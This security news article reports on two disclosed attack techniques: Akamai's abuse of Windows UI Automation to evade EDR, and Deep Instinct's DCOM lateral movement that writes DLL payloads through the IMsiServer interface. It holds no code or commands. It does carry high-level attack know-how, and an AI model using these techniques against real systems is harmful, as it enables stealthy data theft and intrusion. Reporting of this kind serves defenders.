January 22, 2025
New Malware Technique Could Exploit Windows UI Framework to Evade EDR Tools
A newly devised technique leverages a Windows accessibility framework called UI Automation (UIA) to perform a wide range of malicious activities without tipping off endpoint detection and response (EDR) solutions. "To exploit this technique, a user must be convinced to run a program that uses UI Automation," Akamai security researcher Tomer Peled said in a report shared with The Hacker News. "

Dec 11, 2024Ravie LakshmananMalware / Endpoint Security

A newly devised technique leverages a Windows accessibility framework called UI Automation (UIA) to perform a wide range of malicious activities without tipping off endpoint detection and response (EDR) solutions.

“To exploit this technique, a user must be convinced to run a program that uses UI Automation,” Akamai security researcher Tomer Peled said in a report shared with The Hacker News. “This can lead to stealthy command execution, which can harvest sensitive data, redirect browsers to phishing websites, and more.”

Even worse, local attackers could take advantage of this security blindspot to execute commands and read/write messages from/to messaging applications like Slack and WhatsApp. On top of that, it could also be potentially weaponized to manipulate UI elements over a network.

First available in Windows XP as part of the Microsoft .NET Framework, UI Automation is designed to provide programmatic access to various user interface (UI) elements and help users manipulate them using assistive technology products, such as screen readers. It can also be used in automated testing scenarios.

“Assistive technology applications typically need access to the protected system UI elements, or to other processes that might be running at a higher privilege level,” Microsoft notes in a support document. “Therefore, assistive technology applications must be trusted by the system, and must run with special privileges.”

“To get access to higher IL processes, an assistive technology application must set the UIAccess flag in the application’s manifest and be launched by a user with administrator privileges.”

The UI interactions with elements in other applications are achieved by making use of the Component Object Model (COM) as an inter-process communication (IPC) mechanism. This makes it possible to create UIA objects that can be used to interact with an application that’s in focus by setting up an event handler that’s triggered when certain UI changes are detected.

Akamai’s research found that this approach could also open up an avenue for abuse, allowing malicious actors to read/write messages, steal data entered in websites (e.g., payment information), and execute commands that redirect victims to malicious websites when a currently displayed web page in a browser refreshes or changes.

“In addition to the UI elements currently shown on the screen that we can interact with, more elements are loaded in advance and placed in a cache,” Peled noted. “We can also interact with those elements, such as reading messages not shown on the screen, or even set the text box and send messages without it being reflected on the screen.”

That said, it bears noting that each of these malicious scenarios is an intended feature of UI Automation, just like how Android’s accessibility services API has become a staple way for malware to extract information from compromised devices.

“This goes back to the intended purpose of the application: Those permissions levels have to exist in order to use it,” Peled added. “This is why UIA is able to bypass Defender — the application finds nothing out of the ordinary. If something is seen as a feature rather than a bug, the machine’s logic will follow the feature.”

From COM to DCOM: A Lateral Movement Attack Vector

The disclosure comes as Deep Instinct revealed that the Distributed COM (DCOM) Remote Protocol, which allows software components to communicate over a network, could be exploited to remotely write custom payloads to create an embedded backdoor.

The attack “allows the writing of custom DLLs to a target machine, loading them to a service, and executing their functionality with arbitrary parameters,” security researcher Eliran Nissan said. “This backdoor-like attack abuses the IMsiServer COM interface.”

That said, the Israeli cybersecurity company noted that an attack of this kind leaves clear indicators of compromise (IoCs) that can be detected and blocked. It further requires the attacker and victim machines to be in the same domain.

“Until now, DCOM lateral movement attacks have been exclusively researched on IDispatch-based COM objects due to their scriptable nature,” Nissan said. The new ‘DCOM Upload & Execute‘ method “remotely writes custom payloads to the victim’s [Global Assembly Cache], executes them from a service context, and communicates with them, effectively functioning as an embedded backdoor.”

“The research presented here proves that many unexpected DCOM objects may be exploitable for lateral movement, and proper defenses should be aligned.”

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.